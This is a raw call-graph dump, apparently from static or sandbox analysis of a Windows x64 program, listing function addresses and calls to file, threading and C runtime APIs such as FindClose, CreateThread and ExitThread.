41566->41568 41571 7ff72c9ee525 FindClose 41567->41571 41572 7ff72c9ee51a GetLastError 41567->41572 41568->41557 41573 7ff72c9ee755 41568->41573 41576 7ff72c9ee635 41569->41576 41577 7ff72c9ee60f GetLastError 41569->41577 41574 7ff72c9ee6ae GetFileInformationByHandleEx 41570->41574 41575 7ff72c9ee6e8 41570->41575 41571->41564 41572->41557 41600 7ff72ca01774 47 API calls __std_fs_directory_iterator_open 41573->41600 41574->41575 41579 7ff72c9ee6c4 GetLastError 41574->41579 41581 7ff72c9ee6ff 41575->41581 41582 7ff72c9ee73b 41575->41582 41576->41570 41588 7ff72c9ee656 GetFileInformationByHandleEx 41576->41588 41577->41557 41580 7ff72c9ee61d CloseHandle 41577->41580 41579->41557 41585 7ff72c9ee6d6 CloseHandle 41579->41585 41580->41557 41586 7ff72c9ee766 41580->41586 41581->41557 41587 7ff72c9ee705 CloseHandle 41581->41587 41582->41557 41583 7ff72c9ee741 CloseHandle 41582->41583 41583->41557 41583->41573 41584 7ff72c9ee75a 41601 7ff72ca01774 47 API calls __std_fs_directory_iterator_open 41584->41601 41589 7ff72c9ee691 41585->41589 41590 7ff72c9ee760 41585->41590 41603 7ff72ca01774 47 API calls __std_fs_directory_iterator_open 41586->41603 41587->41557 41587->41573 41588->41570 41592 7ff72c9ee672 GetLastError 41588->41592 41589->41557 41602 7ff72ca01774 47 API calls __std_fs_directory_iterator_open 41590->41602 41592->41557 41596 7ff72c9ee680 CloseHandle 41592->41596 41596->41584 41596->41589 41598 7ff72c9ee7b2 GetLastError 41597->41598 41599 7ff72c9ee5c0 41597->41599 41598->41599 41599->41565 41599->41566 41604->41538 41606 7ff72c9cd200 41607 7ff72c9cd25d 41606->41607 41611 7ff72c9cd337 41606->41611 41617 7ff72c9d0b20 41607->41617 41609 7ff72c9cd284 41613 7ff72c9cd2b4 41609->41613 41627 7ff72c9cdb30 41609->41627 41610 7ff72c9cd30d 41637 7ff72c9f49c0 RtlPcToFileHeader RaiseException 41611->41637 41613->41610 41638 7ff72c9f49c0 RtlPcToFileHeader RaiseException 41613->41638 41615 7ff72c9cd3e6 41618 7ff72c9d0b7f 41617->41618 41622 7ff72c9d0b4a 41617->41622 41624 7ff72c9d0b8d 41618->41624 41639 7ff72c9d1160 41618->41639 41619 7ff72c9d0b6e 41619->41609 41621 7ff72c9d0d12 41621->41609 41622->41619 41654 7ff72c9f49c0 RtlPcToFileHeader RaiseException 41622->41654 41624->41621 41655 7ff72c9f49c0 RtlPcToFileHeader RaiseException 41624->41655 41626 7ff72c9d0dd3 41628 7ff72c9cdb63 41627->41628 41636 7ff72c9cdbbb 41628->41636 41660 7ff72c9cfdd0 41628->41660 41630 7ff72c9cdb86 41633 7ff72c9cdba6 41630->41633 41630->41636 41670 7ff72c9fc858 41630->41670 41631 7ff72c9f2770 codecvt 8 API calls 41632 7ff72c9cdc29 41631->41632 41632->41613 41633->41636 41678 7ff72c9fbe50 41633->41678 41636->41631 41637->41613 41638->41615 41640 7ff72c9d1220 41639->41640 41641 7ff72c9d119e 41639->41641 41642 7ff72c9f2770 codecvt 8 API calls 41640->41642 41656 7ff72c9cf970 10 API calls 41641->41656 41644 7ff72c9d124e 41642->41644 41644->41624 41645 7ff72c9d11ab 41646 7ff72c9d120d 41645->41646 41648 7ff72c9d1263 41645->41648 41646->41640 41657 7ff72c9d12c0 RtlPcToFileHeader RaiseException _com_raise_error 41646->41657 41658 7ff72c9f49c0 RtlPcToFileHeader RaiseException 41648->41658 41650 7ff72c9d1309 41650->41624 41651 7ff72c9d12b6 41651->41650 41659 7ff72c9f49c0 RtlPcToFileHeader RaiseException 41651->41659 41653 7ff72c9d1360 41654->41624 41655->41626 41656->41645 41657->41640 41658->41651 41659->41653 41661 7ff72c9cfdf3 41660->41661 41662 7ff72c9cfea2 41660->41662 41661->41662 41664 7ff72c9cfdfd 41661->41664 41663 7ff72c9f2770 codecvt 8 API calls 41662->41663 41665 7ff72c9cfeb1 41663->41665 41668 7ff72c9cfe41 41664->41668 41687 7ff72c9f9c48 41664->41687 41665->41630 41666 7ff72c9f2770 codecvt 8 API calls 41667 7ff72c9cfe5e 41666->41667 41667->41630 41668->41666 41671 7ff72c9fc888 41670->41671 41713 7ff72c9fc5e8 41671->41713 41675 7ff72c9fc8c6 41677 7ff72c9fc8db 41675->41677 41725 7ff72c9f89b4 47 API calls 2 library calls 41675->41725 41677->41633 41679 7ff72c9fbe64 41678->41679 41680 7ff72c9fbe79 41678->41680 41736 7ff72ca01674 11 API calls _set_fmode 41679->41736 41680->41679 41682 7ff72c9fbe7e 41680->41682 41728 7ff72c9fdb84 41682->41728 41683 7ff72c9fbe69 41737 7ff72c9fcd10 47 API calls _invalid_parameter_noinfo_noreturn 41683->41737 41686 7ff72c9fbe74 41686->41636 41688 7ff72c9f9c78 41687->41688 41695 7ff72c9f9998 41688->41695 41691 7ff72c9f9cbc 41693 7ff72c9f9cd1 41691->41693 41703 7ff72c9f89b4 47 API calls 2 library calls 41691->41703 41693->41668 41696 7ff72c9f99e5 41695->41696 41697 7ff72c9f99b8 41695->41697 41696->41691 41702 7ff72c9f89b4 47 API calls 2 library calls 41696->41702 41697->41696 41698 7ff72c9f99c2 41697->41698 41699 7ff72c9f99ed 41697->41699 41711 7ff72c9fcc44 47 API calls _invalid_parameter_noinfo_noreturn 41698->41711 41704 7ff72c9f98d8 41699->41704 41702->41691 41703->41693 41712 7ff72c9f98c0 EnterCriticalSection 41704->41712 41711->41696 41714 7ff72c9fc652 41713->41714 41715 7ff72c9fc612 41713->41715 41714->41715 41716 7ff72c9fc65e 41714->41716 41727 7ff72c9fcc44 47 API calls _invalid_parameter_noinfo_noreturn 41715->41727 41726 7ff72c9f98c0 EnterCriticalSection 41716->41726 41719 7ff72c9fc639 41719->41675 41724 7ff72c9f89b4 47 API calls 2 library calls 41719->41724 41724->41675 41725->41677 41727->41719 41729 7ff72c9fdbb4 41728->41729 41738 7ff72c9fd690 41729->41738 41733 7ff72c9fdc08 41733->41686 41734 7ff72c9fdbf3 41734->41733 41749 7ff72c9f89b4 47 API calls 2 library calls 41734->41749 41736->41683 41737->41686 41739 7ff72c9fd6ab 41738->41739 41740 7ff72c9fd6da 41738->41740 41751 7ff72c9fcc44 47 API calls _invalid_parameter_noinfo_noreturn 41739->41751 41750 7ff72c9f98c0 EnterCriticalSection 41740->41750 41747 7ff72c9fd6cb 41747->41734 41748 7ff72c9f89b4 47 API calls 2 library calls 41747->41748 41748->41734 41749->41733 41751->41747 41752 7ff72c9cd3f0 41753 7ff72c9cd436 41752->41753 41754 7ff72c9d0b20 10 API calls 41753->41754 41755 7ff72c9cd447 41754->41755 41757 7ff72c9cd46c 41755->41757 41761 7ff72c9cdd80 41755->41761 41756 7ff72c9cd4bc 41757->41756 41768 7ff72c9f49c0 RtlPcToFileHeader RaiseException 41757->41768 41759 7ff72c9cd53e 41762 7ff72c9cdd98 41761->41762 41763 7ff72c9cdda4 ctype 41761->41763 41762->41757 41764 7ff72c9cddb5 ctype 41763->41764 41765 7ff72c9cdeee 41763->41765 41769 7ff72c9fc520 41763->41769 41764->41757 41765->41764 41767 7ff72c9fc520 _fread_nolock 63 API calls 41765->41767 41767->41764 41768->41759 41772 7ff72c9fc540 41769->41772 41773 7ff72c9fc56a 41772->41773 41774 7ff72c9fc538 41772->41774 41773->41774 41775 7ff72c9fc5b6 41773->41775 41776 7ff72c9fc579 __scrt_get_show_window_mode 41773->41776 41774->41763 41785 7ff72c9f98c0 EnterCriticalSection 41775->41785 41786 7ff72ca01674 11 API calls _set_fmode 41776->41786 41780 7ff72c9fc58e 41787 7ff72c9fcd10 47 API calls _invalid_parameter_noinfo_noreturn 41780->41787 41786->41780 41787->41774 41788 7ff72c9d6930 41789 7ff72c9d6b6e 41788->41789 41794 7ff72c9d698a 41788->41794 41825 7ff72c9d62a0 50 API calls 2 library calls 41789->41825 41790 7ff72c9d6b69 41824 7ff72c9b2370 50 API calls 3 library calls 41790->41824 41793 7ff72c9d6a62 41795 7ff72c9f93f8 __GSHandlerCheck_EH 47 API calls 41793->41795 41805 7ff72c9d6b0f 41793->41805 41806 7ff72c9d6b38 _Receive_impl 41793->41806 41794->41790 41796 7ff72c9d6a11 41794->41796 41797 7ff72c9d69e8 41794->41797 41803 7ff72c9d69d6 41794->41803 41795->41805 41800 7ff72c9f2a38 std::_Facet_Register 50 API calls 41796->41800 41797->41790 41799 7ff72c9d69f5 41797->41799 41801 7ff72c9f2a38 std::_Facet_Register 50 API calls 41799->41801 41800->41803 41801->41803 41802 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 41804 7ff72c9d6b80 41802->41804 41803->41805 41807 7ff72c9d8870 41803->41807 41805->41802 41805->41806 41808 7ff72c9f2a38 std::_Facet_Register 50 API calls 41807->41808 41809 7ff72c9d88b2 41808->41809 41826 7ff72c9cf4e0 41809->41826 41811 7ff72c9d88d4 41812 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 41811->41812 41813 7ff72c9d88e1 41812->41813 41814 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 41813->41814 41815 7ff72c9d88ee 41814->41815 41840 7ff72c9f91b0 41815->41840 41818 7ff72c9d894c 41858 7ff72c9eecb0 50 API calls 2 library calls 41818->41858 41819 7ff72c9d892b 41821 7ff72c9f2770 codecvt 8 API calls 41819->41821 41822 7ff72c9d8938 41821->41822 41822->41793 41824->41789 41825->41793 41828 7ff72c9cf50e 41826->41828 41829 7ff72c9cf55a 41828->41829 41832 7ff72c9cf5b2 41828->41832 41836 7ff72c9cf52a ctype 41828->41836 41837 7ff72c9cf5ed 41828->41837 41831 7ff72c9f2a38 std::_Facet_Register 50 API calls 41829->41831 41839 7ff72c9cf5e7 41829->41839 41835 7ff72c9cf570 41831->41835 41833 7ff72c9f2a38 std::_Facet_Register 50 API calls 41832->41833 41833->41836 41835->41836 41838 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 41835->41838 41836->41811 41860 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 41837->41860 41838->41839 41859 7ff72c9b2370 50 API calls 3 library calls 41839->41859 41841 7ff72c9f91d0 41840->41841 41842 7ff72c9f91e7 41840->41842 41868 7ff72ca01674 11 API calls _set_fmode 41841->41868 41861 7ff72c9f914c 41842->41861 41846 7ff72c9f91d5 41869 7ff72c9fcd10 47 API calls _invalid_parameter_noinfo_noreturn 41846->41869 41847 7ff72c9f91fa CreateThread 41849 7ff72c9d8923 41847->41849 41850 7ff72c9f922a GetLastError 41847->41850 41849->41818 41849->41819 41870 7ff72ca015e8 11 API calls 2 library calls 41850->41870 41852 7ff72c9f9237 41853 7ff72c9f9246 41852->41853 41854 7ff72c9f9240 CloseHandle 41852->41854 41855 7ff72c9f9255 41853->41855 41856 7ff72c9f924f FreeLibrary 41853->41856 41854->41853 41857 7ff72ca08340 __free_lconv_num 11 API calls 41855->41857 41856->41855 41857->41849 41859->41837 41862 7ff72ca087c4 _set_fmode 11 API calls 41861->41862 41863 7ff72c9f916e 41862->41863 41864 7ff72ca08340 __free_lconv_num 11 API calls 41863->41864 41865 7ff72c9f9178 41864->41865 41866 7ff72c9f9181 GetModuleHandleExW 41865->41866 41867 7ff72c9f917d 41865->41867 41866->41867 41867->41847 41867->41849 41868->41846 41869->41849 41870->41852 41871 7ff72c9d00c0 41881 7ff72c9d1370 41871->41881 41877 7ff72c9d0262 41878 7ff72c9d0234 41878->41877 41906 7ff72c9f49c0 RtlPcToFileHeader RaiseException 41878->41906 41880 7ff72c9d02c4 41882 7ff72c9f2a38 std::_Facet_Register 50 API calls 41881->41882 41883 7ff72c9d13cc 41882->41883 41907 7ff72c9ef0cc 41883->41907 41885 7ff72c9d13dc 41886 7ff72c9d1456 41885->41886 41889 7ff72c9d147e 41885->41889 41887 7ff72c9d0188 41886->41887 41918 7ff72c9f0a64 7 API calls 2 library calls 41886->41918 41892 7ff72c9d1080 41887->41892 41919 7ff72c9f49c0 RtlPcToFileHeader RaiseException 41889->41919 41891 7ff72c9d14cf 41893 7ff72c9f2a38 std::_Facet_Register 50 API calls 41892->41893 41894 7ff72c9d10f7 41893->41894 41895 7ff72c9ef0cc 58 API calls 41894->41895 41896 7ff72c9d01ba 41895->41896 41897 7ff72c9d0f70 41896->41897 41898 7ff72c9d0f91 41897->41898 41899 7ff72c9d1069 41897->41899 41931 7ff72c9f0c1c 41898->41931 41899->41878 41903 7ff72c9d0fbb 41938 7ff72c9d3430 86 API calls 5 library calls 41903->41938 41905 7ff72c9d0fd9 41905->41878 41906->41880 41920 7ff72c9eeae4 41907->41920 41909 7ff72c9ef0ee 41910 7ff72c9ef150 ctype 41909->41910 41928 7ff72c9ef2c4 50 API calls std::_Facet_Register 41909->41928 41924 7ff72c9eeb5c 41910->41924 41913 7ff72c9ef106 41929 7ff72c9ef2f4 48 API calls std::locale::_Setgloballocale 41913->41929 41915 7ff72c9ef1a6 41915->41885 41916 7ff72c9ef111 __std_exception_copy 41916->41910 41917 7ff72c9fdc28 __std_exception_copy 12 API calls 41916->41917 41917->41910 41918->41887 41919->41891 41921 7ff72c9eeaf3 41920->41921 41922 7ff72c9eeaf8 41920->41922 41930 7ff72ca01fd4 6 API calls std::_Locinfo::_Locinfo_ctor 41921->41930 41922->41909 41925 7ff72c9eeb67 LeaveCriticalSection 41924->41925 41926 7ff72c9eeb70 41924->41926 41926->41915 41928->41913 41929->41916 41933 7ff72c9f0c62 41931->41933 41932 7ff72c9d0fa1 41932->41899 41937 7ff72c9cfec0 47 API calls codecvt 41932->41937 41933->41932 41939 7ff72c9fc8f0 75 API calls ProcessCodePage 41933->41939 41935 7ff72c9f0cb0 41935->41932 41940 7ff72c9f8fe0 41935->41940 41937->41903 41938->41905 41939->41935 41941 7ff72c9f9010 41940->41941 41948 7ff72c9f8ebc 41941->41948 41943 7ff72c9f9029 41944 7ff72c9f904e 41943->41944 41958 7ff72c9f89b4 47 API calls 2 library calls 41943->41958 41946 7ff72c9f9063 41944->41946 41959 7ff72c9f89b4 47 API calls 2 library calls 41944->41959 41946->41932 41949 7ff72c9f8f05 41948->41949 41950 7ff72c9f8ed7 41948->41950 41952 7ff72c9f8ef7 41949->41952 41960 7ff72c9f98c0 EnterCriticalSection 41949->41960 41961 7ff72c9fcc44 47 API calls _invalid_parameter_noinfo_noreturn 41950->41961 41952->41943 41958->41944 41959->41946 41961->41952 41962 7ff72ca0c06c 41963 7ff72ca0c09c 41962->41963 41970 7ff72ca0bea0 41963->41970 41966 7ff72ca0c0db 41968 7ff72ca0c0f0 41966->41968 41982 7ff72c9f89b4 47 API calls 2 library calls 41966->41982 41971 7ff72ca0bec9 41970->41971 41973 7ff72ca0bef7 41970->41973 41971->41966 41981 7ff72c9f89b4 47 API calls 2 library calls 41971->41981 41972 7ff72ca0bf10 41984 7ff72c9fcc44 47 API calls _invalid_parameter_noinfo_noreturn 41972->41984 41973->41972 41975 7ff72ca0bf67 41973->41975 41983 7ff72ca0c5d4 EnterCriticalSection 41975->41983 41981->41966 41982->41968 41984->41971 41985 7ff72c9fd340 41986 7ff72c9fd374 41985->41986 41994 7ff72c9fd389 41985->41994 42012 7ff72ca01674 11 API calls _set_fmode 41986->42012 41988 7ff72c9fd379 42013 7ff72c9fcd10 47 API calls _invalid_parameter_noinfo_noreturn 41988->42013 41991 7ff72c9fd384 41992 7ff72c9f2770 codecvt 8 API calls 41991->41992 41993 7ff72c9fd4d3 41992->41993 42004 7ff72c9fd4b8 41994->42004 42005 7ff72ca0d85c 41994->42005 41999 7ff72c9fd66f 42001 7ff72c9fcd60 _invalid_parameter_noinfo_noreturn 17 API calls 41999->42001 42003 7ff72c9fd684 42001->42003 42004->41991 42014 7ff72ca01674 11 API calls _set_fmode 42004->42014 42006 7ff72c9fd5d2 42005->42006 42007 7ff72ca0d86b 42005->42007 42015 7ff72ca0ca00 42006->42015 42027 7ff72ca01f64 EnterCriticalSection 42007->42027 42012->41988 42013->41991 42014->41991 42016 7ff72ca0ca09 42015->42016 42020 7ff72c9fd5e3 42015->42020 42028 7ff72ca01674 11 API calls _set_fmode 42016->42028 42018 7ff72ca0ca0e 42029 7ff72c9fcd10 47 API calls _invalid_parameter_noinfo_noreturn 42018->42029 42020->41999 42021 7ff72ca0ca30 42020->42021 42022 7ff72ca0ca39 42021->42022 42023 7ff72c9fd5f4 42021->42023 42030 7ff72ca01674 11 API calls _set_fmode 42022->42030 42023->41999 42023->42004 42025 7ff72ca0ca3e 42031 7ff72c9fcd10 47 API calls _invalid_parameter_noinfo_noreturn 42025->42031 42028->42018 42029->42020 42030->42025 42031->42023 42032 7ff72c9e8ca9 42033 7ff72c9e8cb1 42032->42033 42034 7ff72c9e8cc6 42032->42034 42033->42034 42036 7ff72c9e74c0 42033->42036 42037 7ff72c9e74f4 42036->42037 42038 7ff72c9e7562 42036->42038 42039 7ff72c9fdc28 __std_exception_copy 12 API calls 42037->42039 42057 7ff72c9e2d00 42038->42057 42040 7ff72c9e74fd 42039->42040 42042 7ff72c9e7546 42040->42042 42043 7ff72c9e7505 ctype 42040->42043 42044 7ff72c9cf4a0 50 API calls 42042->42044 42048 7ff72c9f2770 codecvt 8 API calls 42043->42048 42046 7ff72c9e7557 42044->42046 42045 7ff72c9e7577 42062 7ff72c9e2c50 50 API calls 42045->42062 42056 7ff72c9e7770 50 API calls 3 library calls 42046->42056 42050 7ff72c9e752e 42048->42050 42050->42034 42051 7ff72c9e7598 42063 7ff72c9e7870 50 API calls 3 library calls 42051->42063 42053 7ff72c9e75a1 42064 7ff72c9e75f0 47 API calls 2 library calls 42053->42064 42055 7ff72c9e75c4 _Receive_impl 42055->42034 42056->42038 42058 7ff72c9d1370 58 API calls 42057->42058 42059 7ff72c9e2dc3 42058->42059 42060 7ff72c9d1080 58 API calls 42059->42060 42061 7ff72c9e2df0 42060->42061 42061->42045 42062->42051 42063->42053 42064->42055 42065 7ff72c9f9078 42066 7ff72c9f9086 GetLastError ExitThread 42065->42066 42067 7ff72c9f9095 42065->42067 42068 7ff72ca06f84 _Getctype 47 API calls 42067->42068 42069 7ff72c9f909a 42068->42069 42076 7ff72ca0676c 42069->42076 42072 7ff72c9f90b3 42080 7ff72c9f928c 42072->42080 42077 7ff72ca0677b 42076->42077 42078 7ff72c9f90a6 42076->42078 42077->42078 42084 7ff72ca08b04 5 API calls __crtLCMapStringW 42077->42084 42078->42072 42083 7ff72ca090ec 5 API calls __crtLCMapStringW 42078->42083 42085 7ff72c9f90e8 42080->42085 42083->42072 42084->42078 42094 7ff72ca070fc GetLastError 42085->42094 42087 7ff72c9f9140 ExitThread 42088 7ff72c9f9115 42091 7ff72c9f9123 CloseHandle 42088->42091 42092 7ff72c9f9129 42088->42092 42089 7ff72c9f90f9 42089->42087 42089->42088 42111 7ff72ca09138 5 API calls __crtLCMapStringW 42089->42111 42091->42092 42092->42087 42093 7ff72c9f9137 FreeLibraryAndExitThread 42092->42093 42093->42087 42095 7ff72ca07120 42094->42095 42096 7ff72ca0713d FlsSetValue 42094->42096 42095->42096 42100 7ff72ca0712d 42095->42100 42097 7ff72ca0714f 42096->42097 42096->42100 42099 7ff72ca087c4 _set_fmode 5 API calls 42097->42099 42098 7ff72ca071a9 SetLastError 42098->42089 42101 7ff72ca0715e 42099->42101 42100->42098 42102 7ff72ca0717c FlsSetValue 42101->42102 42103 7ff72ca0716c FlsSetValue 42101->42103 42104 7ff72ca0719a 42102->42104 42105 7ff72ca07188 FlsSetValue 42102->42105 42106 7ff72ca07175 42103->42106 42112 7ff72ca06d34 11 API calls _set_fmode 42104->42112 42105->42106 42108 7ff72ca08340 __free_lconv_num 5 API calls 42106->42108 42108->42100 42109 7ff72ca071a2 42110 7ff72ca08340 __free_lconv_num 5 API calls 42109->42110 42110->42098 42111->42088 42112->42109 42113 7ff72c9f3098 42136 7ff72c9f2b80 42113->42136 42116 7ff72c9f31e4 42158 7ff72c9f36ec 7 API calls 2 library calls 42116->42158 42117 7ff72c9f30b4 __scrt_acquire_startup_lock 42119 7ff72c9f31ee 42117->42119 42125 7ff72c9f30d2 __scrt_release_startup_lock 42117->42125 42159 7ff72c9f36ec 7 API calls 2 library calls 42119->42159 42121 7ff72c9f30f7 42122 7ff72c9f31f9 __std_fs_directory_iterator_open 42123 7ff72c9f317d 42142 7ff72c9f3834 42123->42142 42125->42121 42125->42123 42155 7ff72c9f8800 47 API calls __GSHandlerCheck_EH 42125->42155 42126 7ff72c9f3182 42145 7ff72ca042e8 42126->42145 42134 7ff72c9f31a5 42134->42122 42157 7ff72c9f2d04 7 API calls 42134->42157 42135 7ff72c9f31bc 42135->42121 42137 7ff72c9f2b88 42136->42137 42138 7ff72c9f2b94 __scrt_dllmain_crt_thread_attach 42137->42138 42139 7ff72c9f2b9d 42138->42139 42140 7ff72c9f2ba1 42138->42140 42139->42116 42139->42117 42140->42139 42160 7ff72c9f4cd0 7 API calls 2 library calls 42140->42160 42161 7ff72ca199f0 42142->42161 42144 7ff72c9f384b GetStartupInfoW 42144->42126 42163 7ff72ca11504 42145->42163 42147 7ff72c9f318a 42150 7ff72c9cc760 42147->42150 42148 7ff72ca042f7 42148->42147 42169 7ff72ca11840 47 API calls TranslateName 42148->42169 42172 7ff72c9c83f0 42150->42172 42153 7ff72c9f2770 codecvt 8 API calls 42154 7ff72c9cc788 42153->42154 42156 7ff72c9f3878 GetModuleHandleW 42154->42156 42155->42123 42156->42134 42157->42135 42158->42119 42159->42122 42160->42139 42162 7ff72ca199e0 42161->42162 42162->42144 42162->42162 42164 7ff72ca11556 42163->42164 42165 7ff72ca11511 42163->42165 42164->42148 42170 7ff72ca07058 52 API calls 3 library calls 42165->42170 42167 7ff72ca11540 42171 7ff72ca111dc 67 API calls 3 library calls 42167->42171 42169->42148 42170->42167 42171->42164 42173 7ff72c9c841a std::_Locinfo::_Locinfo_ctor 42172->42173 42875 7ff72c9cf040 42173->42875 42182 7ff72c9d1fe0 10 API calls 42183 7ff72c9c84b6 42182->42183 42920 7ff72c9d22a0 42183->42920 42186 7ff72c9c84e5 42188 7ff72c9cf4a0 50 API calls 42186->42188 42187 7ff72c9c8517 42191 7ff72c9cf4a0 50 API calls 42187->42191 42189 7ff72c9c84f8 42188->42189 42190 7ff72c9b5d00 47 API calls 42189->42190 42192 7ff72c9c8500 42190->42192 42193 7ff72c9c8536 42191->42193 42194 7ff72c9b4550 47 API calls 42192->42194 42195 7ff72c9cf4a0 50 API calls 42193->42195 42872 7ff72c9c850d _Receive_impl 42194->42872 42196 7ff72c9c854a 42195->42196 42197 7ff72c9cf4a0 50 API calls 42196->42197 42198 7ff72c9c855e 42197->42198 42928 7ff72c9ceed0 42198->42928 42199 7ff72c9f2770 codecvt 8 API calls 42201 7ff72c9cc2cb 42199->42201 42201->42153 42203 7ff72c9cf4a0 50 API calls 42204 7ff72c9c85b1 42203->42204 42205 7ff72c9ceed0 50 API calls 42204->42205 42206 7ff72c9c85f0 42205->42206 42938 7ff72c9cece0 42206->42938 42209 7ff72c9cf4a0 50 API calls 42210 7ff72c9c8659 42209->42210 42211 7ff72c9cf4a0 50 API calls 42210->42211 42212 7ff72c9c8674 42211->42212 42213 7ff72c9cf4a0 50 API calls 42212->42213 42214 7ff72c9c8688 42213->42214 42215 7ff72c9ceed0 50 API calls 42214->42215 42216 7ff72c9c86c7 42215->42216 42217 7ff72c9cf4a0 50 API calls 42216->42217 42218 7ff72c9c86d8 42217->42218 42219 7ff72c9ceed0 50 API calls 42218->42219 42220 7ff72c9c8711 42219->42220 42221 7ff72c9cece0 50 API calls 42220->42221 42222 7ff72c9c874a 42221->42222 42223 7ff72c9cf4a0 50 API calls 42222->42223 42224 7ff72c9c875e 42223->42224 42225 7ff72c9cf4a0 50 API calls 42224->42225 42226 7ff72c9c8783 42225->42226 42227 7ff72c9cece0 50 API calls 42226->42227 42228 7ff72c9c8790 42227->42228 42229 7ff72c9cece0 50 API calls 42228->42229 42230 7ff72c9c879d 42229->42230 42231 7ff72c9cf4a0 50 API calls 42230->42231 42232 7ff72c9c87e8 42231->42232 42941 7ff72c9d2960 42232->42941 42235 7ff72c9cf4a0 50 API calls 42236 7ff72c9c8817 42235->42236 42237 7ff72c9cf4a0 50 API calls 42236->42237 42238 7ff72c9c882b 42237->42238 42239 7ff72c9cf4a0 50 API calls 42238->42239 42240 7ff72c9c883f 42239->42240 42241 7ff72c9ceed0 50 API calls 42240->42241 42242 7ff72c9c887e 42241->42242 42243 7ff72c9cf4a0 50 API calls 42242->42243 42244 7ff72c9c888f 42243->42244 42245 7ff72c9ceed0 50 API calls 42244->42245 42246 7ff72c9c88c8 42245->42246 42247 7ff72c9cece0 50 API calls 42246->42247 42248 7ff72c9c88f2 42247->42248 42249 7ff72c9cf4a0 50 API calls 42248->42249 42250 7ff72c9c8931 42249->42250 42251 7ff72c9cf4a0 50 API calls 42250->42251 42252 7ff72c9c894c 42251->42252 42253 7ff72c9cf4a0 50 API calls 42252->42253 42254 7ff72c9c8960 42253->42254 42255 7ff72c9ceed0 50 API calls 42254->42255 42256 7ff72c9c899f 42255->42256 42257 7ff72c9cf4a0 50 API calls 42256->42257 42258 7ff72c9c89b0 42257->42258 42259 7ff72c9ceed0 50 API calls 42258->42259 42260 7ff72c9c89e9 42259->42260 42261 7ff72c9cece0 50 API calls 42260->42261 42262 7ff72c9c8a22 42261->42262 42263 7ff72c9cf4a0 50 API calls 42262->42263 42264 7ff72c9c8a36 42263->42264 42265 7ff72c9cf4a0 50 API calls 42264->42265 42266 7ff72c9c8a5b 42265->42266 42267 7ff72c9cece0 50 API calls 42266->42267 42268 7ff72c9c8a68 42267->42268 42269 7ff72c9cece0 50 API calls 42268->42269 42270 7ff72c9c8a75 42269->42270 42271 7ff72c9cf4a0 50 API calls 42270->42271 42272 7ff72c9c8ac0 42271->42272 42273 7ff72c9d2960 50 API calls 42272->42273 42274 7ff72c9c8adb 42273->42274 42275 7ff72c9cf4a0 50 API calls 42274->42275 42276 7ff72c9c8aef 42275->42276 42277 7ff72c9cf4a0 50 API calls 42276->42277 42278 7ff72c9c8b03 42277->42278 42279 7ff72c9cf4a0 50 API calls 42278->42279 42280 7ff72c9c8b17 42279->42280 42281 7ff72c9ceed0 50 API calls 42280->42281 42282 7ff72c9c8b56 42281->42282 42283 7ff72c9cf4a0 50 API calls 42282->42283 42284 7ff72c9c8b67 42283->42284 42285 7ff72c9ceed0 50 API calls 42284->42285 42286 7ff72c9c8ba0 42285->42286 42287 7ff72c9cece0 50 API calls 42286->42287 42288 7ff72c9c8bca 42287->42288 42289 7ff72c9cf4a0 50 API calls 42288->42289 42290 7ff72c9c8c09 42289->42290 42291 7ff72c9cf4a0 50 API calls 42290->42291 42292 7ff72c9c8c24 42291->42292 42293 7ff72c9cf4a0 50 API calls 42292->42293 42294 7ff72c9c8c38 42293->42294 42295 7ff72c9ceed0 50 API calls 42294->42295 42296 7ff72c9c8c77 42295->42296 42297 7ff72c9cf4a0 50 API calls 42296->42297 42298 7ff72c9c8c8b 42297->42298 42299 7ff72c9ceed0 50 API calls 42298->42299 42300 7ff72c9c8cca 42299->42300 42301 7ff72c9cece0 50 API calls 42300->42301 42302 7ff72c9c8d03 42301->42302 42303 7ff72c9cf4a0 50 API calls 42302->42303 42304 7ff72c9c8d17 42303->42304 42305 7ff72c9cf4a0 50 API calls 42304->42305 42306 7ff72c9c8d3c 42305->42306 42307 7ff72c9cece0 50 API calls 42306->42307 42308 7ff72c9c8d49 42307->42308 42309 7ff72c9cece0 50 API calls 42308->42309 42310 7ff72c9c8d56 42309->42310 42311 7ff72c9cf4a0 50 API calls 42310->42311 42312 7ff72c9c8da1 42311->42312 42313 7ff72c9d2960 50 API calls 42312->42313 42314 7ff72c9c8dbc 42313->42314 42315 7ff72c9cf4a0 50 API calls 42314->42315 42316 7ff72c9c8dd0 42315->42316 42317 7ff72c9cf4a0 50 API calls 42316->42317 42318 7ff72c9c8de4 42317->42318 42319 7ff72c9ceed0 50 API calls 42318->42319 42320 7ff72c9c8e23 42319->42320 42321 7ff72c9cece0 50 API calls 42320->42321 42322 7ff72c9c8e5c 42321->42322 42323 7ff72c9cf4a0 50 API calls 42322->42323 42324 7ff72c9c8e9b 42323->42324 42325 7ff72c9cf4a0 50 API calls 42324->42325 42326 7ff72c9c8eb4 42325->42326 42327 7ff72c9ceed0 50 API calls 42326->42327 42328 7ff72c9c8eee 42327->42328 42329 7ff72c9cece0 50 API calls 42328->42329 42330 7ff72c9c8f36 42329->42330 42331 7ff72c9cf4a0 50 API calls 42330->42331 42332 7ff72c9c8f4a 42331->42332 42333 7ff72c9cf4a0 50 API calls 42332->42333 42334 7ff72c9c8f6f 42333->42334 42335 7ff72c9cece0 50 API calls 42334->42335 42336 7ff72c9c8f7c 42335->42336 42337 7ff72c9cece0 50 API calls 42336->42337 42338 7ff72c9c8f89 42337->42338 42339 7ff72c9cf4a0 50 API calls 42338->42339 42340 7ff72c9c8fb7 42339->42340 42341 7ff72c9cf4a0 50 API calls 42340->42341 42342 7ff72c9c8fcb 42341->42342 42343 7ff72c9ceed0 50 API calls 42342->42343 42344 7ff72c9c900a 42343->42344 42345 7ff72c9cf4a0 50 API calls 42344->42345 42346 7ff72c9c901e 42345->42346 42347 7ff72c9d2960 50 API calls 42346->42347 42348 7ff72c9c9039 42347->42348 42349 7ff72c9cf4a0 50 API calls 42348->42349 42350 7ff72c9c904d 42349->42350 42351 7ff72c9cf4a0 50 API calls 42350->42351 42352 7ff72c9c9061 42351->42352 42353 7ff72c9cf4a0 50 API calls 42352->42353 42354 7ff72c9c9075 42353->42354 42355 7ff72c9ceed0 50 API calls 42354->42355 42356 7ff72c9c90b4 42355->42356 